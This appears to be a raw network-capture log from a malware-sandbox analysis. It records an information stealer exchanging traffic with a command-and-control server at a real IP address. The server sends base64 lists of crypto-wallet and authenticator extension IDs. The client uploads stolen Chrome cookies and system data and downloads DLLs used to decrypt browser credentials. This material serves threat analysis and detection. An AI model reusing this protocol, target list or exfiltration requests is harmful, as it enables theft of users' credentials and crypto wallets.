                                                                                                                                                Oct 6, 2024 22:18:40.986906052 CEST1236INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                                                                                                Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
                                                                                                                                                Oct 6, 2024 22:18:40.986918926 CEST448INData Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57
                                                                                                                                                Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
                                                                                                                                                Oct 6, 2024 22:18:40.987517118 CEST1236INData Raw: 62 32 4a 35 66 47 70 75 61 32 56 73 5a 6d 46 75 61 6d 74 6c 59 57 52 76 62 6d 56 6a 59 57 4a 6c 61 47 46 73 62 57 4a 6e 63 47 5a 76 5a 47 70 74 66 44 46 38 4d 48 77 77 66 46 4a 76 62 6d 6c 75 49 46 64 68 62 47 78 6c 64 48 78 72 61 6d 31 76 62 32
                                                                                                                                                Data Ascii: b2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZvZGptfDF8MHwwfFJvbmluIFdhbGxldHxram1vb2hsZ29rY2NvZGljampmZWJmb21sYmxqZ2Zoa3wxfDB8MHxCeW9uZXxubGdiaGRmZ2RoZ2JpYW1mZGZtYmlrY2RnaGlkb2FkZHwxfDB8MHxPbmVLZXl8am5tYm9iam1obG5nb2VmYWlvamZsamNraWxoaGxoY2p8MXw
                                                                                                                                                Oct 6, 2024 22:18:40.987528086 CEST224INData Raw: 66 45 46 31 64 47 68 6c 62 6e 52 70 59 32 46 30 62 33 4a 38 59 6d 68 6e 61 47 39 68 62 57 46 77 59 32 52 77 59 6d 39 6f 63 47 68 70 5a 32 39 76 62 32 46 6b 5a 47 6c 75 63 47 74 69 59 57 6c 38 4d 58 77 77 66 44 42 38 51 58 56 30 61 48 6c 38 5a 32
                                                                                                                                                Data Ascii: fEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGFvbGJ8MXwwfDB8RU9TIEF1dGhlbnRpY2F0b3J8b2VsamRsZHBubWRiY2hvbmllbGlkZ29iZGRmZmZsYWx8MXwwfDB8R0F1dGggQXV0aGVu
                                                                                                                                                Oct 6, 2024 22:18:40.988456964 CEST1236INData Raw: 64 47 6c 6a 59 58 52 76 63 6e 78 70 62 47 64 6a 62 6d 68 6c 62 48 42 6a 61 47 35 6a 5a 57 56 70 63 47 6c 77 61 57 70 68 62 47 70 72 59 6d 78 69 59 32 39 69 62 48 77 78 66 44 42 38 4d 48 78 43 61 58 52 33 59 58 4a 6b 5a 57 35 38 62 6d 35 6e 59 32
                                                                                                                                                Data Ascii: dGljYXRvcnxpbGdjbmhlbHBjaG5jZWVpcGlwaWphbGprYmxiY29ibHwxfDB8MHxCaXR3YXJkZW58bm5nY2Vja2JhcGViZmltbmxuaWlpYWhrYW5kY2xibGJ8MXwwfDB8S2VlUGFzc1hDfG9ib29uYWtlbW9mcGFsY2dnaG9jZm9hZG9maWRqa2trfDF8MHwwfERhc2hsYW5lfGZkamFtYWtwZmJiZGRmamFvb2lrZmNwYXBqb2h
                                                                                                                                                Oct 6, 2024 22:18:40.988471031 CEST224INData Raw: 63 47 35 72 62 57 52 71 63 47 39 6a 5a 32 74 6f 59 58 77 78 66 44 42 38 4d 48 78 44 62 32 6c 75 61 48 56 69 66 47 70 6e 59 57 46 70 62 57 46 71 61 58 42 69 63 47 52 76 5a 33 42 6b 5a 32 78 6f 59 58 42 6f 62 47 52 68 61 32 6c 72 5a 32 56 6d 66 44
                                                                                                                                                Data Ascii: cG5rbWRqcG9jZ2toYXwxfDB8MHxDb2luaHVifGpnYWFpbWFqaXBicGRvZ3BkZ2xoYXBobGRha2lrZ2VmfDF8MHwwfE11bHRpdmVyc1ggRGVGaSBXYWxsZXR8ZG5nbWxibGNvZGZvYnBkcGVjYWFkZ2ZiY2dnZmpmbm18MXwwfDB8RnJvbnRpZXIgV2FsbGV0fGtwcGZkaWlwcGhmY2NlbWNpZ25oaWZw
                                                                                                                                                Oct 6, 2024 22:18:40.988481045 CEST1236INData Raw: 61 6d 74 68 63 47 5a 69 61 57 68 6b 66 44 46 38 4d 48 77 77 66 46 4e 68 5a 6d 56 51 59 57 78 38 62 47 64 74 63 47 4e 77 5a 32 78 77 62 6d 64 6b 62 32 46 73 59 6d 64 6c 62 32 78 6b 5a 57 46 71 5a 6d 4e 73 62 6d 68 68 5a 6d 46 38 4d 58 77 77 66 44
                                                                                                                                                Data Ascii: amthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnBsZ2JufDF8MHwwfEZsdXZpIFdhbGxldHxtbW1qYmNmb2Zjb25rYW5uam9uZm1qamFqcGxsZGRiZ3wxfDB8MHx
                                                                                                                                                Oct 6, 2024 22:18:40.988493919 CEST268INData Raw: 64 48 78 71 61 57 6c 6b 61 57 46 68 62 47 6c 6f 62 57 31 6f 5a 47 52 71 5a 32 4a 75 59 6d 64 6b 5a 6d 5a 73 5a 57 78 76 59 33 42 68 61 33 77 78 66 44 42 38 4d 48 78 55 54 30 34 67 56 32 46 73 62 47 56 30 66 47 35 77 61 48 42 73 63 47 64 76 59 57
                                                                                                                                                Data Ascii: dHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxUT04gV2FsbGV0fG5waHBscGdvYWtoaGpjaGtraG1pZ2dha2lqbmtoZm5kfDF8MHwwfE15VG9uV2FsbGV0fGZsZGZwZ2lwZm5jZ25kZm9sY2JrZGVla25iYmJuaGNjfDF8MHwwfFVuaXN3YXAgRXh0ZW5zaW9ufG5ucG1mcGxrZm9nZnBtY25ncGxobmJ
                                                                                                                                                Oct 6, 2024 22:18:40.990478039 CEST467OUTPOST /ce4b71a59f4ee761.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----AEBGIEGCFHCFHIDHIJEC
                                                                                                                                                Host: 45.145.4.234
                                                                                                                                                Content-Length: 268
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 37 31 33 36 38 64 36 39 63 36 33 39 32 38 31 39 32 31 62 36 34 36 32 65 32 64 37 36 37 38 64 37 63 64 31 65 31 62 30 33 37 63 61 39 34 63 37 37 63 36 35 37 65 33 62 32 66 32 36 63 31 33 39 63 66 65 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 2d 2d 0d 0a
                                                                                                                                                Data Ascii: ------AEBGIEGCFHCFHIDHIJECContent-Disposition: form-data; name="token"6e71368d69c639281921b6462e2d7678d7cd1e1b037ca94c77c657e3b2f26c139cfe1124------AEBGIEGCFHCFHIDHIJECContent-Disposition: form-data; name="message"fplugins------AEBGIEGCFHCFHIDHIJEC--
                                                                                                                                                Oct 6, 2024 22:18:41.171375990 CEST335INHTTP/1.1 200 OK
                                                                                                                                                Date: Sun, 06 Oct 2024 20:18:41 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Length: 108
                                                                                                                                                Keep-Alive: timeout=5, max=96
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                                                                                                Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                                                                                                Oct 6, 2024 22:18:41.189786911 CEST200OUTPOST /ce4b71a59f4ee761.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----EBFBKKJECAKEHJJJDBAF
                                                                                                                                                Host: 45.145.4.234
                                                                                                                                                Content-Length: 6455
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Oct 6, 2024 22:18:41.189837933 CEST6455OUTData Raw: 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 4b 4a 45 43 41 4b 45 48 4a 4a 4a 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 37 31 33 36
                                                                                                                                                Data Ascii: ------EBFBKKJECAKEHJJJDBAFContent-Disposition: form-data; name="token"6e71368d69c639281921b6462e2d7678d7cd1e1b037ca94c77c657e3b2f26c139cfe1124------EBFBKKJECAKEHJJJDBAFContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                                Oct 6, 2024 22:18:41.490134001 CEST202INHTTP/1.1 200 OK
                                                                                                                                                Date: Sun, 06 Oct 2024 20:18:41 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Content-Length: 0
                                                                                                                                                Keep-Alive: timeout=5, max=95
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Oct 6, 2024 22:18:41.766841888 CEST91OUTGET /bc17a177456805bc/sqlite3.dll HTTP/1.1
                                                                                                                                                Host: 45.145.4.234
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Oct 6, 2024 22:18:41.954509974 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                Date: Sun, 06 Oct 2024 20:18:41 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
                                                                                                                                                ETag: "10e436-5e7eeebed8d80"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 1106998
                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                                                                                                                                Oct 6, 2024 22:18:43.193578959 CEST950OUTPOST /ce4b71a59f4ee761.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----BGDAKEHIIDGDAAKECBFB
                                                                                                                                                Host: 45.145.4.234
                                                                                                                                                Content-Length: 751
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 4b 45 48 49 49 44 47 44 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 37 31 33 36 38 64 36 39 63 36 33 39 32 38 31 39 32 31 62 36 34 36 32 65 32 64 37 36 37 38 64 37 63 64 31 65 31 62 30 33 37 63 61 39 34 63 37 37 63 36 35 37 65 33 62 32 66 32 36 63 31 33 39 63 66 65 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 4b 45 48 49 49 44 47 44 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 4b 45 48 49 49 44 47 44 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED]
                                                                                                                                                Data Ascii: ------BGDAKEHIIDGDAAKECBFBContent-Disposition: form-data; name="token"6e71368d69c639281921b6462e2d7678d7cd1e1b037ca94c77c657e3b2f26c139cfe1124------BGDAKEHIIDGDAAKECBFBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------BGDAKEHIIDGDAAKECBFBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3LWdUY1dxSHZadlpiYWZPcGtxUnkwZEx5WUc5QWpQMnZiVUJvbWFybmM5cGNaVmxoSGtVZVVhV011ckQwR0dYeVcwNV9CXzFJeVVOWUVFTG15cVJnCi5nb29nbGUuY29tCVRSVUUJLwlGQUxTRQkxNjk5MDcxNjQwCTFQX0pBUgkyMDIzLTEwLTA1LTA2Cg==------BGDAKEHIIDGDAAKECBFB--
                                                                                                                                                Oct 6, 2024 22:18:43.402278900 CEST202INHTTP/1.1 200 OK
                                                                                                                                                Date: Sun, 06 Oct 2024 20:18:43 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Content-Length: 0
                                                                                                                                                Keep-Alive: timeout=5, max=93
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Oct 6, 2024 22:18:43.494059086 CEST562OUTPOST /ce4b71a59f4ee761.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----EHDBGDHDAECBGDHJKFID
                                                                                                                                                Host: 45.145.4.234
                                                                                                                                                Content-Length: 363
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 37 31 33 36 38 64 36 39 63 36 33 39 32 38 31 39 32 31 62 36 34 36 32 65 32 64 37 36 37 38 64 37 63 64 31 65 31 62 30 33 37 63 61 39 34 63 37 37 63 36 35 37 65 33 62 32 66 32 36 63 31 33 39 63 66 65 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                Data Ascii: ------EHDBGDHDAECBGDHJKFIDContent-Disposition: form-data; name="token"6e71368d69c639281921b6462e2d7678d7cd1e1b037ca94c77c657e3b2f26c139cfe1124------EHDBGDHDAECBGDHJKFIDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EHDBGDHDAECBGDHJKFIDContent-Disposition: form-data; name="file"------EHDBGDHDAECBGDHJKFID--
                                                                                                                                                Oct 6, 2024 22:18:43.685909986 CEST202INHTTP/1.1 200 OK
                                                                                                                                                Date: Sun, 06 Oct 2024 20:18:43 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Content-Length: 0
                                                                                                                                                Keep-Alive: timeout=5, max=92
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Oct 6, 2024 22:18:44.913258076 CEST562OUTPOST /ce4b71a59f4ee761.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----CAAAFCAKKKFBFIDGDBFH
                                                                                                                                                Host: 45.145.4.234
                                                                                                                                                Content-Length: 363
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 37 31 33 36 38 64 36 39 63 36 33 39 32 38 31 39 32 31 62 36 34 36 32 65 32 64 37 36 37 38 64 37 63 64 31 65 31 62 30 33 37 63 61 39 34 63 37 37 63 36 35 37 65 33 62 32 66 32 36 63 31 33 39 63 66 65 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                Data Ascii: ------CAAAFCAKKKFBFIDGDBFHContent-Disposition: form-data; name="token"6e71368d69c639281921b6462e2d7678d7cd1e1b037ca94c77c657e3b2f26c139cfe1124------CAAAFCAKKKFBFIDGDBFHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CAAAFCAKKKFBFIDGDBFHContent-Disposition: form-data; name="file"------CAAAFCAKKKFBFIDGDBFH--
                                                                                                                                                Oct 6, 2024 22:18:45.103535891 CEST202INHTTP/1.1 200 OK
                                                                                                                                                Date: Sun, 06 Oct 2024 20:18:45 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Content-Length: 0
                                                                                                                                                Keep-Alive: timeout=5, max=91
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Oct 6, 2024 22:18:45.511538982 CEST91OUTGET /bc17a177456805bc/freebl3.dll HTTP/1.1
                                                                                                                                                Host: 45.145.4.234
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Oct 6, 2024 22:18:45.687707901 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                Date: Sun, 06 Oct 2024 20:18:45 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                ETag: "a7550-5e7ebd4425100"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 685392
                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                                                                                                Oct 6, 2024 22:18:46.422980070 CEST91OUTGET /bc17a177456805bc/mozglue.dll HTTP/1.1
                                                                                                                                                Host: 45.145.4.234
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Oct 6, 2024 22:18:46.599503994 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                Date: Sun, 06 Oct 2024 20:18:46 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                ETag: "94750-5e7ebd4425100"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 608080
                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                                                                                                Oct 6, 2024 22:18:46.998079062 CEST92OUTGET /bc17a177456805bc/msvcp140.dll HTTP/1.1
                                                                                                                                                Host: 45.145.4.234
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Oct 6, 2024 22:18:47.174354076 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                Date: Sun, 06 Oct 2024 20:18:47 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                ETag: "6dde8-5e7ebd4425100"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 450024
                                                                                                                                                Content-Type: application/x-msdos-program
